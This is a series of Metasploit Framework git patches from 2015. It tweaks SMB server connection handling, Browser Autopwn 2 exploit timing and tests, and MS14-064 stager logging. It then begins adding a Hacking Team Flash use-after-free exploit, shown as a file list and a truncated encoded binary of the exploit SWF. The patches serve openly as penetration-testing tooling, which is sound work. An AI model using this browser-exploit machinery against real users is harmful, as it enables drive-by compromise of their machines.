@@ -95,10 +147,11 @@ module Msf
           pkt = CONST::SMB_BASE_PKT.make_struct
           pkt.from_s(buff)
 
-          # Only response to requests, ignore server replies
+          # Only respond to requests, ignore server replies
           if (pkt['Payload']['SMB'].v['Flags1'] & 128 != 0)
-            print_status("Ignoring server response from #{smb[:name]}")
-            next
+            vprint_status("Dropping connection from #{smb[:name]} due to missing client request flag")
+            smb_stop(c)
+            return
           end
 
           cmd = pkt['Payload']['SMB'].v['Command']
@@ -149,6 +202,38 @@ module Msf
         pkt['Payload']['SMB'].v['ErrorClass'] = errorclass
         c.put(pkt.to_s)
       end
+
+      # Update the last-seen timestamp and purge old entries
+      def smb_pool_update(c)
+
+        @state[c][:last_action] = Time.now.to_f
+        @smb_server_request_counter += 1
+
+        unless @smb_server_request_counter % 100 == 0 ||
+          @smb_server_last_pool_sweep + datastore['SMBServerIdleTimeout'].to_f < Time.now.to_f
+          return
+        end
+
+        # Synchronize pool sweeps in case we move to threaded services
+        @smb_server_pool_mutex.synchronize do
+          purge_list = []
+
+          @smb_server_last_pool_sweep = Time.now.to_f
+
+          @state.keys.each do |sc|
+            if @state[sc][:last_action] + datastore['SMBServerIdleTimeout'].to_f < Time.now.to_f
+              purge_list << sc
+            end
+          end
+
+          # Purge any idle connections to rescue file descriptors
+          purge_list.each do |sc|
+            vprint_status("Dropping connection from #{@state[sc][:name]} due to idle timeout...")
+            smb_stop(sc)
+          end
+        end
+      end
+
     end
   end
 

From e16cd08599ff15411b83dbc906d607cdfcc81d9f Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Mon, 6 Jul 2015 17:16:56 -0400
Subject: [PATCH 0664/1013] Update the payload CachedSize

---
 modules/payloads/stagers/python/reverse_tcp_uuid.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/payloads/stagers/python/reverse_tcp_uuid.rb b/modules/payloads/stagers/python/reverse_tcp_uuid.rb
index 0b5e7878d2..ebb0a1d9d5 100644
--- a/modules/payloads/stagers/python/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/python/reverse_tcp_uuid.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit4
 
-  CachedSize = 442
+  CachedSize = 446
 
   include Msf::Payload::Stager
   include Msf::Payload::Python

From 4a70e23f9aa0ec81d409945b8d5f105783732922 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 6 Jul 2015 19:20:15 -0500
Subject: [PATCH 0665/1013] Add ExploitReloadTimeout datastore option

Some exploits require more time, and if we try the next exploit too
soon, it may crash the browser.
---
 lib/msf/core/exploit/browser_autopwnv2.rb    | 2 +-
 modules/auxiliary/server/browser_autopwn2.rb | 1 +
 2 files changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index a75b95cf02..9e59061fd3 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -811,7 +811,7 @@ module Msf
         var firstUri = exploitList.splice(0, 1);
         if (firstUri != '') {
           e.setAttribute("src", firstUri);
-          setTimeout("loadExploit()", 1000);
+          setTimeout("loadExploit()", #{datastore['ExploitReloadTimeout']});
         }
       }
       |
diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb
index 95a70337ee..8c8d967344 100644
--- a/modules/auxiliary/server/browser_autopwn2.rb
+++ b/modules/auxiliary/server/browser_autopwn2.rb
@@ -77,6 +77,7 @@ class Metasploit3 < Msf::Auxiliary
       ], self.class)
 
     register_advanced_options([
+        OptInt.new('ExploitReloadTimeout', [false, 'Number of milliseconds before trying the next exploit', 3000]),
         OptInt.new('MaxExploitCount', [false, 'Number of browser exploits to load', 20]),
         OptString.new('HTMLContent', [false, 'HTML Content', '']),
         OptAddressRange.new('AllowedAddresses', [false, "A range of IPs you're interested in attacking"]),

From a9eeae56cb59e51a90bf5c83b65c7dc3581d5084 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 6 Jul 2015 22:24:32 -0500
Subject: [PATCH 0666/1013] Remove the broken parts in browser_autopwnv2_spec

---
 .../core/exploit/browser_autopwnv2_spec.rb    | 88 +------------------
 1 file changed, 1 insertion(+), 87 deletions(-)

diff --git a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
index eef314059e..2e811b8696 100644
--- a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
+++ b/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
@@ -391,23 +391,6 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     end
   end
 
-  describe '#note_type_prefix' do
-    it 'returns an unique note type' do
-      expect(subject.note_type_prefix).to match(/^BAP\.\d+\.Client$/)
-    end
-  end
-
-  describe '#rm_target_info_notes' do
-    before(:each) do
-      allow(subject).to receive(:note_type_prefix).and_return("#{note_type_prefix}.#{profile_tag}")
-    end
-
-    it 'empties target_info_notes' do
-      subject.rm_target_info_notes
-      expect(subject.framework.db.notes).to be_empty
-    end
-  end
-
   context 'when removing jobs' do
     describe '#rm_exploit_jobs' do
       before(:each) do
@@ -456,9 +439,6 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
         expect(xploit.datastore['URIPATH']).to match(/^\/\w+/)
       end
 
-      it 'sets Msf::Exploit::Remote::BrowserAutopwnv2 as MODULEOWNER' do
-        expect(xploit.datastore['MODULEOWNER']).to eq(Msf::Exploit::Remote::BrowserAutopwnv2)
-      end
     end
   end
 
@@ -535,7 +515,7 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
         it 'returns one exploit' do
           expect(subject.instance_variable_get(:@bap_exploits).length).to eq(3)
 
-          allow(subject).to receive(:datastore).and_return({'MaxExploits'=>1})
+          allow(subject).to receive(:datastore).and_return({'MaxExploitCount'=>1})
           subject.finalize_sorted_modules(bap_groups)
           expect(subject.instance_variable_get(:@bap_exploits).length).to eq(1)
         end
@@ -738,23 +718,6 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
       end
     end
 
-    describe '#show_real_list' do
-      before(:each) do
-        allow(subject).to receive(:set_exploit_options)
-        subject.instance_variable_set(:@bap_exploits, [])
-        subject.init_exploits
-        allow(subject).to receive(:retrieve_tag)
-        unpacked_profile = MessagePack.unpack(profile_packed_data)
-        allow(subject).to receive(:get_profile_info).and_return(unpacked_profile)
-      end
-
-      it 'shows exploits' do
-        suitable_exploits = subject.get_suitable_exploits(cli, cli_req)
-        output = get_stdout { subject.show_real_list('127.0.0.1', profile_tag, suitable_exploits) }
-        expect(output).to include('ms14_064_ole_code_execution')
-      end
-    end
-
     describe '#set_payload' do
       it 'shows set_payload' do
         output = get_stdout { subject.set_payload }
@@ -763,25 +726,6 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     end
   end
 
-  describe '#get_suitable_exploits' do
-    before(:each) do
-      allow(subject).to receive(:set_exploit_options)
-      subject.instance_variable_set(:@bap_exploits, [])
-      subject.init_exploits
-      allow(subject).to receive(:retrieve_tag)
-      unpacked_profile = MessagePack.unpack(profile_packed_data)
-      allow(subject).to receive(:get_profile_info).and_return(unpacked_profile)
-    end
-
-    context 'when client is Windows' do
-      it 'returns ms14_064' do
-        suitable_exploits = subject.get_suitable_exploits(cli, cli_req)
-        expect(suitable_exploits.length).to eq(1)
-        expect(suitable_exploits.first.fullname).to eq('windows/browser/ms14_064_ole_code_execution')
-      end
-    end
-  end
-
   describe '#log_click' do
     let(:ip) { '192.168.1.123' }
 
@@ -827,35 +771,5 @@ describe Msf::Exploit::Remote::BrowserAutopwnv2 do
     end
   end
 
-  describe '#build_html' do
-    before(:each) do
-      ms14_064 = create_fake_ms14_064
-      allow(subject).to receive(:get_suitable_exploits).and_return([ms14_064])
-      url_list = subject.get_exploit_urls(cli, cli_req)
-      allow(subject).to receive(:get_exploit_urls).and_return(url_list)
-    end
-
-    let(:html) do
-      subject.build_html(cli, cli_req)
-    end
-
-    context 'it returns javascript functions' do
-      it 'contains the setElementStyle function' do
-        expect(html).to match(/function setElementStyle/)
-      end
-
-      it 'contains the moveIframe function' do
-        expect(html).to match(/function moveIframe/)
-      end
-
-      it 'contains the onload function' do
-        expect(html).to match(/window\.onload = function/)
-      end
-
-      it 'contains the loadExploit function' do
-        expect(html).to match(/function loadExploit/)
-      end
-    end
-  end
 
 end
\ No newline at end of file

From 9a1500ee966c4e6e2ac4c992ecd5d725695053b0 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 6 Jul 2015 22:31:07 -0500
Subject: [PATCH 0667/1013] Change module name a little bit, makes it easier to
 find in GUI

---
 modules/auxiliary/server/browser_autopwn2.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb
index 8c8d967344..96558e0c26 100644
--- a/modules/auxiliary/server/browser_autopwn2.rb
+++ b/modules/auxiliary/server/browser_autopwn2.rb
@@ -10,7 +10,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "HTTP Client Automatic Exploiter (Browser Autopwn)",
+      'Name'           => "HTTP Client Automatic Exploiter 2 (Browser Autopwn)",
       'Description'    => %q{
         This module will automatically serve browser exploits. Here are the options you can
         configure:

From 6d30dfd93e536f5f25c48b2d43976c7e84cd936d Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 6 Jul 2015 23:28:52 -0500
Subject: [PATCH 0668/1013] Remove the parts that are not broken for BES spec

---
 .../remote/browser_exploit_server_spec.rb     | 74 +------------------
 1 file changed, 1 insertion(+), 73 deletions(-)

diff --git a/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
index 74a3620147..78efa7e5d8 100644
--- a/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
@@ -113,43 +113,6 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     end
   end
 
-  describe '#get_bad_requirements' do
-    let(:this_profile) do
-      MessagePack.unpack(first_packed_profile)
-    end
-
-    let(:requirements) { {} }
-
-    before(:each) do
-      r = server.instance_variable_get(:@requirements)
-      requirements.each_pair do |key, value|
-        r[key] = value
-      end
-
-      server.instance_variable_set(:@requirements, r)
-    end
-
-    context 'when all requirements are met' do
-      let(:requirements) { first_profile_info }
-      it 'returns an empty bad requirement array' do
-        expect(server.get_bad_requirements(this_profile)).to be_empty
-      end
-    end
-
-    context 'when the os_name requirement is not met' do
-      let(:requirements) { {'os_name'=>'Linux'} }
-      it 'returns os_name in the array as a bad requirement' do
-        expect(server.get_bad_requirements(this_profile)).to eq(['os_name'])
-      end
-    end
-
-    context 'when a Linux regex cannot match a Winodws os_name' do
-      let(:requirements) { {'os_name'=>/Linux/} }
-      it 'returns os_name in the array as a bad requirement' do
-        expect(server.get_bad_requirements(this_profile)).to eq(['os_name'])
-      end
-    end
-  end
 
   describe '#get_detection_html' do
     it "returns the detection code that the client will get" do
@@ -179,30 +142,11 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     end
   end
 
-  describe '#try_set_target' do
-    let(:fake_targets) do
-      target = double('Msf::Module::Target')
-      allow(target).to receive(:opts) { first_profile_info }
-      [target]
-    end
-
-    before(:each) do
-      allow_any_instance_of(described_class).to receive(:targets) { fake_targets }
-    end
-
-    context 'when requirements match a target' do
-      it 'sets @target' do
-        expect(server.get_target).to be_nil
-        server.try_set_target(MessagePack.unpack(first_packed_profile))
-        expect(server.get_target).to eq(fake_targets.first)
-      end
-    end
-  end
 
   describe 'extract_requirements' do
     context 'when a recognizable requirement is given' do
       it 'returns a hash that contains the recognizable requirement' do
-        expected_hash = {'os_name'=>'Linux'}
+        expected_hash = {:os_name=>'Linux'}
         expect(server.extract_requirements(expected_hash)).to eq(expected_hash)
       end
     end
@@ -269,13 +213,6 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
       @on_request_exploit_called = false
     end
 
-    context 'when / is requested' do
-      it 'sends the information gathering page' do
-        cli_request = Rex::Proto::Http::Request.new 
-        server.on_request_uri(cli, cli_request)
-        expect(@send_redirect_called).to be_truthy
-      end
-    end
 
     context 'when info_receiver_page is requested' do
       it 'sends an empty page' do
@@ -297,15 +234,6 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
       end
     end
 
-    context 'when exploit_receiver_page is requested' do
-      it 'calls on_request_exploit' do
-        exploit_receiver_page_var = server.instance_variable_get(:@exploit_receiver_page)
-        cli_request = Rex::Proto::Http::Request.new
-        cli_request.uri = exploit_receiver_page_var
-        server.on_request_uri(cli, cli_request)
-        expect(@on_request_exploit_called).to be_truthy
-      end
-    end
   end
 
   describe '#get_payload' do

From dc0ce88279af42db2fbc3c6efb05e633d2a96bcf Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 7 Jul 2015 00:32:20 -0500
Subject: [PATCH 0669/1013] We're note actually using Mubex, it might be
 causing a crash too

A problem we are seeing is that sometimes when BAP terminates
(ie: jobs -K), we hit a deadlock while jobs are trying to cleanup,
and sometimes that might cause msfconsole to crash and terminate.
We suspect this Mubex is a contributing factor but it has been hard
to prove because it's very hard to reproduce the crash.
---
 lib/msf/core/exploit/remote/browser_exploit_server.rb | 10 +---------
 1 file changed, 1 insertion(+), 9 deletions(-)

diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index 4b7cdffbf0..58599cc2b7 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -108,7 +108,7 @@ module Msf
       if !custom_404.blank? && custom_404 !~ /^http/i
         raise Msf::OptionValidateError.new(['Custom404 (must begin with http or https)'])
       end
-      @bes_mutex = Mutex.new
+
       super
     end
 
@@ -144,14 +144,6 @@ module Msf
     end
 
 
-    # Allows a block of code to access BES resources in a thread-safe fashion
-    #
-    # @param block [Proc] Block of code to sync
-    def sync(&block)
-      @bes_mutex.synchronize(&block)
-    end
-
-
     # Returns the resource (URI) to the module to allow access to on_request_exploit
     #
     # @return [String] URI to the exploit page

From c37b60de7b2d22b59af76bd0d4e60623db23033d Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 7 Jul 2015 00:57:37 -0500
Subject: [PATCH 0670/1013] Do some print_status with ms14_064

---
 modules/exploits/windows/browser/ms14_064_ole_code_execution.rb | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
index 34240e01a5..99cd39a738 100644
--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -375,6 +375,7 @@ end function
         # It should be \r\n .
         vbs = Msf::Util::EXE.to_exe_vbs(data).gsub(/\x0a/, "\r\n")
 
+        print_status("Sending VBS stager")
         send_response(cli, vbs)
       else
         # The VBS technique is only for Windows XP. So if a non-XP system is requesting it,
@@ -382,6 +383,7 @@ end function
         send_not_found(cli)
       end
     else
+      print_status("Sending exploit...")
       send_exploit_html(cli, get_html)
     end
   end

From d9aacf2d41539e5e2347197230a4f9b5b66ce44c Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 7 Jul 2015 11:19:48 -0500
Subject: [PATCH 0671/1013] Add module for hacking team flash exploit

---
 data/exploits/hacking_team/msf.swf            | Bin 0 -> 29417 bytes
 external/source/exploits/hacking_team/Elf.as  | 235 +++++++++++
 .../source/exploits/hacking_team/Exploit.as   |  37 ++
 .../exploits/hacking_team/ExploitByteArray.as |  85 ++++
 .../exploits/hacking_team/ExploitVector.as    |  75 ++++
 .../source/exploits/hacking_team/Exploiter.as | 399 ++++++++++++++++++
 .../source/exploits/hacking_team/Logger.as    |  32 ++
 .../source/exploits/hacking_team/MyClass.as   |  93 ++++
 .../source/exploits/hacking_team/MyClass1.as  |   9 +
 .../source/exploits/hacking_team/MyClass2.as  | 115 +++++
 external/source/exploits/hacking_team/PE.as   |  72 ++++
 .../browser/adobe_flash_hacking_team_uaf.rb   | 143 +++++++
 12 files changed, 1295 insertions(+)
 create mode 100755 data/exploits/hacking_team/msf.swf
 create mode 100755 external/source/exploits/hacking_team/Elf.as
 create mode 100755 external/source/exploits/hacking_team/Exploit.as
 create mode 100755 external/source/exploits/hacking_team/ExploitByteArray.as
 create mode 100755 external/source/exploits/hacking_team/ExploitVector.as
 create mode 100755 external/source/exploits/hacking_team/Exploiter.as
 create mode 100755 external/source/exploits/hacking_team/Logger.as
 create mode 100755 external/source/exploits/hacking_team/MyClass.as
 create mode 100755 external/source/exploits/hacking_team/MyClass1.as
 create mode 100755 external/source/exploits/hacking_team/MyClass2.as
 create mode 100755 external/source/exploits/hacking_team/PE.as
 create mode 100644 modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb

diff --git a/data/exploits/hacking_team/msf.swf b/data/exploits/hacking_team/msf.swf
new file mode 100755
index 0000000000000000000000000000000000000000..6c2d91cdcc18d1dce6aebf1f909d867b72007e9c
GIT binary patch
literal 29417
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
